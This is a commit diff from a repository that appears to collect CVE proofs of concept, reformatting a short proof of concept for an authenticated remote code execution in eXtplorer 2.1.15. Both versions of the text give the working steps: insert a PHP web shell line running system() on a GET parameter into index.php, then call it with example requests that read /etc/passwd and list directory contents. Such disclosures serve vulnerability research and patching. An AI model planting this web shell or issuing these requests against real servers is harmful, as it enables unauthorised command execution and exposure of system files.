Projects STRLCPY CVE-2023-27842 Commits 6f02c9cc
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    1  -Title: eXtplorer 2.1.15 – Insecure Permissions following Remote Code Execution (Authenticated)
    2  -Date: 2022-11-09
    3  -Author: Francisco Marinho
    4  -Vendor Homepage:
    5  -Software Link:
    6  -Version: 2.1.15
    7  -Tested on: Linux
    8  -==========> POC <==========
    9  - 
    10  -1- Login with your account
    11  -2- Access the directory /index.php
    12  -3- Edit index.php, adding “system($_GET[‘tristao’]);” on line two.
    13  -4- Acess homepage index.php
    14  -Examples:
    15  -cat /etc/passwd
    16  -/index.php?tristao=cat%20%20/etc/passwd
    17  -cat ls -la
    18  -/index.php?tristao=ls%20-la
     1 +Title: eXtplorer 2.1.15 – Insecure Permissions following Remote Code Execution (Authenticated)<br>
     2 +Date: 2022-11-09<br>
     3 +Author: Francisco Marinho<br>
     4 +Vendor Homepage:<br>
     5 +Software Link:<br>
     6 +Version: 2.1.15<br>
     7 +Tested on: Linux<br>
     8 +==========> POC <==========<br>
     9 +<br>
     10 +1- Login with your account<br>
     11 +2- Access the directory /index.php<br>
     12 +3- Edit index.php, adding “system($_GET[‘tristao’]);” on line two.<br>
     13 +4- Acess homepage index.php<br>
     14 +Examples:<br>
     15 +cat /etc/passwd<br>
     16 +/index.php?tristao=cat%20%20/etc/passwd<br>
     17 +cat ls -la<br>
     18 +/index.php?tristao=ls%20-la<br>
    19 19   
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